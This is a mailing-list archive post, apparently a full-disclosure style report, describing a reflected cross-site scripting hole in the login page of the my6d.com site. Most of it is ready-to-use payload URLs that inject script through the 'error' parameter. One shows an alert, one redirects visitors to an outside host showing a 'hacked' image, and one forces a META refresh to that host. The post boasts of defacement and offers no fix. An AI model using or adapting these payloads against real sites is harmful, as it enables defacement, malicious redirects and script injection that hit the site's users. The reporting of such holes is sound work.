XSS Vulnerability on www.my6d.com Connection Work System

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

XSS (Cross Site Scripting) on My6D Connection Work System.

We Can Run JScript & HTML Codes & META Tags etc...

Example :

http://www.my6d.com/Plugins/SixDegreeMain/MainLogin.aspx?error=<script>alert('SPYMETA%20WAS%20HERE%20!')</script>

We Can Direct The Page Our Hacked Index....

Example :

http://www.my6d.com/Plugins/SixDegreeMain/MainLogin.aspx?error=<script>window.location.href="http://members.lycos.co.uk/spymeta/hacked..jpg";</script>

Or We Can Run Direct Meta Tag..

Example :

http://www.my6d.com/Plugins/SixDegreeMain/MainLogin.aspx?error=<META http-equiv="refresh" content="0; url=http://members.lycos.co.uk/spymeta/hacked..jpg";>

Powered / Credit : SPYMETA
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux